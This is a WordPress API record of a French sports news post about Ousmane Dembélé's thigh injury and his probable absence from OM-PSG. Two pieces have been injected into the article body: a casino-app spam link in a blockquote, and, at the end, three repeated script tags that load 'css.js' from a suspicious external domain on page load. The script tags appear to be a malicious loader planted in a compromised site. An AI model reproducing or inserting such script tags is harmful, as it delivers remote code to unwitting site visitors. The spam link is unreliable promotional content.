{"id":3995,"date":"2025-11-20T03:55:35","date_gmt":"2025-11-20T03:55:35","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3995"},"modified":"2026-02-02T22:10:33","modified_gmt":"2026-02-02T22:10:33","slug":"om-blesse-en-equipe-de-france-ousmane-dembele-devrait-manquer-om-psg","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-blesse-en-equipe-de-france-ousmane-dembele-devrait-manquer-om-psg\/","title":{"rendered":"OM &#8211; bless\u00e9 en \u00e9quipe de France, Ousmane Demb\u00e9l\u00e9 devrait manquer OM\/PSG"},"content":{"rendered":"<h1>OM &#8211; bless\u00e9 en \u00e9quipe de France, Ousmane Demb\u00e9l\u00e9 devrait manquer OM\/PSG<\/h1>\n<p>L\u2019entr\u00e9e en jeu d\u2019<strong>Ousmane Demb\u00e9l\u00e9<\/strong> vendredi soir face \u00e0 l\u2019Ukraine a rapidement vir\u00e9 \u00e0 la mauvaise limonade. Rempla\u00e7ant au coup d\u2019envoi, l\u2019attaquant parisien a d\u00fb quitter ses partenaires une demi-heure plus tard, victime d\u2019une douleur \u00e0 la cuisse droite. Cette nouvelle alerte musculaire contraint le joueur de 28 ans \u00e0 quitter le rassemblement tricolore et laisse planer de gros doutes sur sa disponibilit\u00e9 pour les prochaines \u00e9ch\u00e9ances, notamment le match contre l&#x27;OM programm\u00e9 dans deux semaines au V\u00e9lodrome.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-amneville-fr.com\/casino-amneville-app\/\" target=\"_blank\" rel=\"dofollow\">casino amneville app<\/a><\/strong> &#8211; Vous \u00eates amateur de jeux d&#039;argent en ligne et vous cherchez une solution mobile fiable et performante pour jouer partout ? Comment t\u00e9l\u00e9charger l&#039;application<\/p><\/blockquote>\n<h2>Le PSG accuse l\u2019\u00e9quipe de France<\/h2>\n<p>Du c\u00f4t\u00e9 parisien, la col\u00e8re est palpable. Selon <em>L&#x27;Equipe<\/em>, les dirigeants estiment avoir averti le staff m\u00e9dical des Bleus du risque \u00e9lev\u00e9 de rechute pour leur attaquant, d\u00e9j\u00e0 g\u00ean\u00e9 par une douleur aux ischios la semaine pass\u00e9e en championnat. Le fait de l\u2019avoir fait entrer, malgr\u00e9 ces signaux d\u2019alerte, passe tr\u00e8s mal au sein du club francilien, o\u00f9 l\u2019on pointe une gestion jug\u00e9e irresponsable.<\/p>\n<h2>Deschamps assume son choix<\/h2>\n<p>Face aux critiques, <strong>Didier Deschamps<\/strong> a d\u00e9fendu sa d\u00e9cision. Le s\u00e9lectionneur a expliqu\u00e9 que le joueur \u00e9tait apte, m\u00e9dicalement valid\u00e9 et dans de bonnes dispositions. Selon lui, cette blessure aurait pu arriver \u00e0 n\u2019importe quel autre \u00e9l\u00e9ment du groupe. Une justification qui ne devrait pas suffire \u00e0 apaiser les tensions avec le PSG, d\u00e9j\u00e0 remont\u00e9 contre la F\u00e9d\u00e9ration apr\u00e8s plusieurs pr\u00e9c\u00e9dents similaires.<\/p>\n<h2>Un Classique sans Demb\u00e9l\u00e9 ?<\/h2>\n<p>Le calendrier rend la situation encore plus d\u00e9licate. Paris doit affronter l\u2019Atalanta Bergame en Ligue des champions le 17 septembre, avant OM-PSG le dimanche 21. Compte tenu de la nature de sa blessure, il para\u00eet tr\u00e8s improbable de voir Demb\u00e9l\u00e9 figurer dans le groupe pour ces deux affiches capitales. Une absence qui fragiliserait les plans de Luis Enrique, d\u00e9j\u00e0 confront\u00e9 \u00e0 une s\u00e9rie de blessures dans son effectif.<\/p>\n<h2>Demb\u00e9l\u00e9 \u00e0 son aise au V\u00e9lodrome<\/h2>\n<p>Pour l\u2019OM, la possible indisponibilit\u00e9 de l\u2019ailier parisien repr\u00e9sente une donn\u00e9e non n\u00e9gligeable. Il faut dire qu&#x27;en trois rencontres au V\u00e9lodrome, Demb\u00e9l\u00e9 s&#x27;est toujours montr\u00e9 d\u00e9cisif et a toujours gagn\u00e9. L&#x27;an dernier, il avait \u00e9t\u00e9 passeur d\u00e9cisif sur le but du 0-3 de Barcola \u00e0 la 40e minute. La saison d&#x27;avant, alors que l&#x27;OM \u00e9tait en sup\u00e9riorit\u00e9 num\u00e9rique, c&#x27;est lui qui lance Vitinha pour l&#x27;ouverture du score (victoire finale du PSG 2-0). Enfin, avant ses aventures \u00e0 Dortmund et \u00e0 Barcelone, il avait tr\u00e8s mal \u00e0 Nicolas Nkoulou alors qu&#x27;il \u00e9tait en train d&#x27;exploser sous le maillot de Rennes en 2016. Non content d&#x27;avoir marqu\u00e9 le but du 0-3 \u00e0 la&#8230; 14e minute de jeu (alors que les supporters faisaient gr\u00e8ve et n&#x27;avaient pas rejoint les gradins pour le premier quart d&#x27;heure) et il avait humili\u00e9 le d\u00e9fenseur marseillais d&#x27;un crochet avant de servir Giovanni Sio pour le cinqui\u00e8me but des Bretons de la soir\u00e9e (score final 2-5 pour Rennes).<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; bless\u00e9 en \u00e9quipe de France, Ousmane Demb\u00e9l\u00e9 devrait manquer OM\/PSG L\u2019entr\u00e9e en jeu d\u2019Ousmane Demb\u00e9l\u00e9 vendredi soir face \u00e0 l\u2019Ukraine a rapidement vir\u00e9 \u00e0 la mauvaise limonade. Rempla\u00e7ant&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3995","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3995","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3995"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3995\/revisions"}],"predecessor-version":[{"id":14868,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3995\/revisions\/14868"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3995"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3995"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3995"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}